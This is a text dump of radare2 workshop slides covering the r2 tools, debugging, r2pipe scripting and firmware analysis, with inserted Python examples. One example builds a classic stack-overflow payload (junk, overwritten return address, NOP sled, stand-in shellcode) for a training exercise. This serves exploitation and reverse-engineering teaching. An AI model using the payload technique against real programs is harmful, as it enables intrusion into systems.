radare2

First r2babies steps - Long Version

Maxime Morin (@Maijin212), Anton Kochkov (@akochkov)


August 16, 2015
ISSA South Africa
maxime morin

∙ 22 y/o French expat @ Luxembourg
∙ Food, Travel and Languages <3
∙ I hate Bullshit
∙ [Link] CERT team leader (2 days/week) and incident response @ European Commission CSIRC (3 days/week)
∙ User of radare2 (impossibru!)
∙ I'm creating tests + documentation

1
anton kochkov

∙ Living in Moscow, Russia


∙ Reverse Engineering, Languages and Travel
∙ Reverse engineer, firmware security analyst at SecurityCode Ltd.
∙ Member of r2 crew

2
generality on radare2 framework

∙ r1 2006, r2 2009
∙ Multi-(OSes|Archs|Bindings|FileFormats|...)
∙ 10 tools based on the framework
∙ Around 111 contributors from various fields
∙ GSOC + RSOC
∙ CLI/VisualMode/GUI/WebGUI
∙ around 350K LOC

3
Installation !

4
installation

∙ Always use git version!


∙ Use the provided VM on SSH (radare:radare / root:radare)
∙ git clone [Link] && cd radare2 && ./sys/[Link]
∙ Use the Windows installer [Link]

5
utilities

∙ rax2
∙ rabin2
∙ rasm2
∙ radiff2
∙ rafind2
∙ rahash2
∙ radare2
∙ rarun2
∙ ragg2/ragg2-cc

7
utilities: rax2

rax2 — Base converter

$ rax2 10

0xa

$ rax2 33 0x41 0101b

0x21 65 0x5

$ rax2 -s 4142434445

ABCDE

$ rax2 0x5*101b+5

30

9
utilities: rabin2

rabin2 — Binary program info extractor

$ rabin2 -e

Entrypoints

$ rabin2 -i

Shows imports

$ rabin2 -zz

Shows strings

$ rabin2 -g

Show all possible information

11


utilities: rasm2

rasm2 — assembler and disassembler tool

$ rasm2 -a x86 -b 32 'mov eax, 33'

Assemble

$ rasm2 -d 9090

Disassemble

$ rasm2 -L

List supported asm plugins

$ rasm2 -a x86 -b 32 'mov eax, 33' -C

Output in C format

13
utilities: radiff2

radiff2 — unified binary diffing utility

$ radiff2 original patched

Code diffing

$ radiff2 -C original patched

Code diffing using graphdiff algorithm

$ radiff2 -g main -a x86 -b 32 original patched

Graph diff output of the given symbol, or between two functions at given offsets: one for each binary.

15
utilities: radiff2 — graph example

/bin/true /bin/false

16
utilities: rafind2

rafind2 — search for byte patterns and strings in files

$ rafind2 -X -s passwd [Link]

Search for the string passwd

18
utilities: rahash2

rahash2 — block based hashing utility

$ rahash2 -a all [Link]

Display hashes of the whole file with all algos

$ rahash2 -B -b 512 -a md5

Compute md5 per block of 512

$ rahash2 -B -b 512 -a entropy

Compute the Shannon entropy per block of 512 bytes (high-entropy blocks hint at packed or encrypted data)

$ echo -n "admin" | rahash2 -a md5 -

Compute the md5 of the string admin read from stdin (equivalent: rahash2 -a md5 -s admin)

20
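The per-block hashing and entropy that rahash2 -B reports, re-implemented in plain Python as an added example (this is not code from the slides or from the radare2 project, and it needs no r2 install). SAMPLE is a constructed buffer of 512 zero bytes, 512 pseudo-random bytes and 512 zero bytes, so the middle block stands out in the entropy view while the two zero blocks share one md5; whole_file_digest() with a block the size of the input mirrors what the r2 command #sha1 $s @ 0 does.

```python
"""Block hashing and per-block entropy in the style of rahash2 -B -b <size> -a <algo>.

Added example, not part of the r2 project; pure Python, no radare2 needed.
SAMPLE is a constructed buffer: 512 zero bytes, 512 pseudo-random bytes, 512 zero bytes.
"""
import hashlib
import math

BLOCK = 512

# Constructed input: a deterministic "random-looking" block built from SHA-256 digests.
_RANDOMISH = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(BLOCK // 32))
SAMPLE = bytes(BLOCK) + _RANDOMISH + bytes(BLOCK)


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant block, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def block_digests(data: bytes, algo: str = "md5", block_size: int = BLOCK):
    """Return [(offset, value)] per block, like `rahash2 -B -b block_size -a algo`.

    algo is either "entropy" or any hashlib algorithm name (md5, sha1, sha256, ...).
    """
    out = []
    for off in range(0, len(data), block_size):
        block = data[off:off + block_size]
        if algo == "entropy":
            out.append((off, shannon_entropy(block)))
        else:
            out.append((off, hashlib.new(algo, block).hexdigest()))
    return out


def whole_file_digest(data: bytes, algo: str) -> str:
    """One block covering the whole buffer: what `#sha1 $s @ 0` does inside r2."""
    if not data:
        return hashlib.new(algo, b"").hexdigest()
    return block_digests(data, algo, block_size=len(data))[0][1]


def high_entropy_blocks(data: bytes, threshold: float = 7.0, block_size: int = BLOCK):
    """Offsets of blocks that look packed or encrypted (entropy >= threshold)."""
    return [off for off, e in block_digests(data, "entropy", block_size) if e >= threshold]


if __name__ == "__main__":
    for off, h in block_digests(SAMPLE, "md5"):
        print(f"0x{off:08x}  md5      {h}")
    for off, e in block_digests(SAMPLE, "entropy"):
        print(f"0x{off:08x}  entropy  {e:.3f}")
    print("suspicious blocks:", [hex(o) for o in high_entropy_blocks(SAMPLE)])
```

The 7.0 threshold is a common rule of thumb for "compressed or encrypted", not a hard limit: a 512-byte block of truly random bytes averages around 7.6 bits per byte because many of the 256 symbols never occur in such a short window, so use a larger block when hunting for small encrypted blobs.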


radare2 — command line
1 command <-> 1 reverse-engineering notion

Keep in mind that:

1. Every character has a meaning, e.g. w = write, p = print
2. Every command is a succession of characters, e.g. pdf = p (print) d (disassemble) f (function)
3. Every command is documented with cmd?, e.g. pdf?, ?, ???, ?$?, ?@?

23
the # command — hashing command

1. Open a file with radare2: radare2 <file>
2. Get usage on the command: #? (Usage: #algo <size> @ addr)
3. List all existing algorithms: ##
4. SHA1: #sha1
5. Hash from the beginning: #sha1 @ 0
6. With a hash block size equal to the size of the file: #sha1 $s @ 0x0

This is the same as rahash2 -a sha1 <file>

24
the i command — information command

1. Get Usage on the command i?


2. Same as rabin2
3. izj displays the strings as JSON
4. internal commands: ~ (grep filter), ls, {} (JSON indent), ...

25
radare2 — ’major’ command example: pf

Quick Demo

26
radare2 — cli main commands

1. r2 -A or r2 then aaa : Analysis


2. s : Seek
3. pdf : Print disassemble function
4. af? : Analyse function
5. ax? : Analyse XREF
6. /? : Search
7. ps? : Print strings
8. C? : Comments
9. w? : Write

27
radare2 — visual mode
radare2 — visual mode main commands

1. V? : Visual help
2. p/P : rotate print modes
3. move using arrows/hjkl
4. o : seek to
5. e : r2configurator
6. v : Function list
7. _ : HUD
8. V : ASCII Graph
9. u : Go back
10. 0-9 : Jump to function

29
radare2 — webui

r2 -A -c=H filename

31
radare2 — debugger

1. radare2 -d
2. Quickly switch to Visual debugger mode: Vpp
3. OllyDBG/IDApro shortcuts friendly

33
rarun2

Rarun2 — run programs in exotic environments

1. Environment setup tool for radare2
2. Most useful with the debugger
3. aslr, stdout, arguments, r2preload ...

35
ragg2/ragg2-cc

Ragg2/Ragg2-cc — frontend for compiling shellcodes

37
debugging

∙ Native local debug (r2 -d)


∙ r2 agent (rap:// protocol)
∙ GDB remote protocol support
∙ WinDBG remote protocol support

38
native debug

Better to use the visual mode

r2 -d /bin/ls

39
gdb protocol

Just run gdbserver somewhere and connect r2 to it:

r2 -D gdb -d /bin/ls gdb://[Link]:4589

40
gdb protocol + wine

winedbg can run Windows programs and expose them through the gdbserver protocol too:

winedbg --gdb --no-start [Link]

r2 -a x86 -b 32 -D gdb -d [Link] gdb://localhost:44840

41
windbg

r2 can connect to WinDBG/KD [1]

For example, to debug the Windows kernel via the serial port:

bcdedit /debug on

bcdedit /dbgsettings serial debugport:1 baudrate:115200

then connect r2:

r2 -a x86 -b 32 -D wind windbg:///tmp/[Link]

For now, connecting to QEMU and VirtualBox is tested.

[1] r2windbg

42
debugging omap bootrom

Just run it in the modified qemu [Link]

./configure --target-list=arm-softmmu ; make ; sudo make install

qemu-system-arm -M milestone -m 256 -L . -bios [Link] -mtdblock [Link] -d in_asm,cpu,exec -nographic -s -S

r2 -D gdb -b arm gdb://localhost:9999

The same approach can be used for any customized hardware.

43
scripting capabilities

Available for a lot of programming languages

Radare2 Bindings —

R2Pipe —

Demo time !

45
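An r2pipe script of the kind demoed here, written as an added example (it is not the slides' demo nor code from the radare2 project): open a binary, run the analysis, pull the imports with iij, and for each risky libc function ask axtj who calls it. Only risky_call_sites() needs the r2pipe package and an r2 on PATH; the two JSON helpers are exercised offline on constructed samples of iij and axtj output, whose addresses and function names are made up for the example.

```python
"""Find call sites of risky libc imports with r2pipe.

Added example, not from the slides or the radare2 project. r2pipe and the r2
binary are only needed inside risky_call_sites(); the JSON helpers run offline.
"""
import json

RISKY = {"gets", "strcpy", "strcat", "sprintf", "system", "scanf"}

# Constructed sample of what `iij` (imports as JSON) returns for a small 32-bit ELF.
SAMPLE_IIJ = json.loads("""[
 {"ordinal":1,"bind":"GLOBAL","type":"FUNC","name":"printf","plt":134513712},
 {"ordinal":2,"bind":"GLOBAL","type":"FUNC","name":"strcpy","plt":134513728},
 {"ordinal":3,"bind":"GLOBAL","type":"FUNC","name":"__libc_start_main","plt":134513744},
 {"ordinal":4,"bind":"GLOBAL","type":"FUNC","name":"gets","plt":134513760}
]""")

# Constructed sample of `axtj @ sym.imp.strcpy` (cross references to that import).
SAMPLE_AXTJ = json.loads("""[
 {"from":134513935,"type":"CALL","opcode":"call sym.imp.strcpy","fcn_addr":134513904,"fcn_name":"sym.vuln"},
 {"from":134514010,"type":"CALL","opcode":"call sym.imp.strcpy","fcn_addr":134513984,"fcn_name":"main"}
]""")


def risky_imports(imports):
    """Names from `iij` output that are on the RISKY list, sorted."""
    return sorted(i["name"] for i in imports
                  if i.get("type") == "FUNC" and i["name"] in RISKY)


def call_sites(xrefs):
    """Turn `axtj` output into (calling function, call address) pairs."""
    return [(x.get("fcn_name", "?"), x["from"]) for x in xrefs if x.get("type") == "CALL"]


def risky_call_sites(path):
    """Open `path` in r2, analyse it, and map each risky import to its callers."""
    import r2pipe  # pip install r2pipe; needs radare2 on PATH

    r2 = r2pipe.open(path, flags=["-2"])  # -2: silence r2's stderr
    try:
        r2.cmd("aaa")
        report = {}
        for name in risky_imports(r2.cmdj("iij") or []):
            report[name] = call_sites(r2.cmdj(f"axtj @ sym.imp.{name}") or [])
        return report
    finally:
        r2.quit()


if __name__ == "__main__":
    import sys
    for name, sites in risky_call_sites(sys.argv[1]).items():
        for fn, addr in sites:
            print(f"{name:10s} called from {fn} at 0x{addr:x}")
```

cmdj() parses the JSON for you, so prefer the j-suffixed commands (iij, aflj, axtj, izj) over scraping the text output; the plain cmd() is still needed for commands without a JSON form such as aaa.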
now your turn!

∙ Crackmes: IOLI-Crackme, flare-on 2015 challenges


∙ Exploitation: pwn1, pwn2, ropasaurus
∙ Malware(1/3): Practical malware analysis samples
∙ Malware(2/3): Any RAT samples see decoder on:
[Link]
∙ Malware(3/3): [Link], MalekalDB
∙ Firmware/BIOS/UEFI: TODO

46
documentation

∙ Website: [Link]
∙ Blog: [Link]
∙ Book: [Link]

47
exploitation (jvoisin work :-) )
49
stack

[diagram: stack frame 1 drawn above stack frame 2, each as a column of cells; surrounding memory elided]
50
stack smashing

51
pwn1

∙ Written for this workshop


∙ Oldschool classic example
∙ You’ll write the final exploit

53
hu-ho.

54
de bruijn patterns

55
exploit!

∙ No ASLR
∙ No NX
∙ No Canary

56
generate shellcode

57
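The de Bruijn pattern trick from the previous slides and the classic payload layout for the no-ASLR/no-NX/no-canary case above, as an added example in Python (not the workshop's pwn1 solution, and not radare2 code; r2 offers the same pattern generation and offset lookup through ragg2 -P and the wop commands). de_bruijn() builds a sequence in which every 4-byte window is unique, so the value that lands in EIP when the target crashes identifies the exact offset of the saved return address; build_payload() then lays out junk, the overwritten return address, a NOP sled and the shellcode. The shellcode bytes and the 0xbffff000 return address in the usage section are constructed stand-ins, not values from any real target.

```python
"""De Bruijn crash patterns and a classic stack-smash payload layout.

Added example, not from the workshop's pwn1. The pattern/offset logic is the
idea behind `ragg2 -P <len>` and r2's wop commands; the payload builder assumes
the slide's setup (no ASLR, no NX, no canary) and a constructed stand-in shellcode.
"""
import string
import struct

ALPHABET = string.ascii_lowercase.encode()


def de_bruijn(length, alphabet=ALPHABET, n=4):
    """First `length` bytes of the de Bruijn sequence B(k, n) over `alphabet`.

    Every n-byte window is unique, so a register value read from a crash maps
    back to exactly one offset in the input.
    """
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):  # Lyndon-word construction (FKM algorithm)
        if len(seq) >= length:
            return
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                if len(seq) >= length:
                    break
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in seq[:length])


def pattern_offset(pattern, value, width=4):
    """Offset in `pattern` of the crashing value (int as read from EIP, or raw bytes), or None."""
    if isinstance(value, int):
        needles = (value.to_bytes(width, "little"), value.to_bytes(width, "big"))
    else:
        needles = (bytes(value),)
    for needle in needles:
        idx = pattern.find(needle)
        if idx != -1:
            return idx
    return None


def build_payload(offset, ret_addr, shellcode, nops=64):
    """junk up to the saved return address, then ret_addr, then a NOP sled + shellcode.

    ret_addr must point into the sled (a stack address seen in the debugger);
    with no ASLR it stays valid between runs, with no NX the sled is executable.
    """
    return b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nops + shellcode


if __name__ == "__main__":
    pat = de_bruijn(200)
    print(pat.decode())
    # Suppose the debugger shows EIP = 0x61616163 after feeding `pat` to pwn1.
    off = pattern_offset(pat, 0x61616163)
    print("saved EIP is overwritten at offset", off)
    fake_shellcode = b"\xcc" * 4           # constructed stand-in; use ragg2 output for real
    payload = build_payload(off, 0xbffff000, fake_shellcode)  # 0xbffff000: assumed sled address
    print(len(payload), "bytes of payload")
```

A 32-bit little-endian EIP of 0x61616163 is the bytes "caaa", which sits at offset 8 of the pattern "aaaabaaacaaad..."; an offset of None means the crash value did not come from your input (or the pattern was too short), which is the first thing to check before building the payload.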
your turn!

Write a working exploit!

58
show me yours, i’ll show you mine

59
malware analysis
other r2 commands i use frequently at work

1. #?
2. ?d, i?
3. Visual mode and associated (VVV, Vv, ;, ...)
4. Analysis command (axt, agf, ...)
5. /m?, /C?, pf, px?, p6d, p=
6. yara, zF
7. pr, wt
8. basic zsh/bash scripting, r2-pipe

61
firmware analysis
uefi analysis

∙ Dump the image using flashrom or hardware
∙ Unpack the image using UEFITool [2]
∙ Open the selected PE or TE file using r2

[2] uefitool

63
old legacy bios analysis

∙ Load the whole image or unpack it using bios_extract [3]
∙ Open it using the correct segment and offset
∙ r2 loads the whole BIOS image automatically
∙ r2 asrock_p4i65g.bin
∙ > . asrock_p4i65g.r2 (runs the r2 script that sets up segments and offsets)

[3] bios-extract

64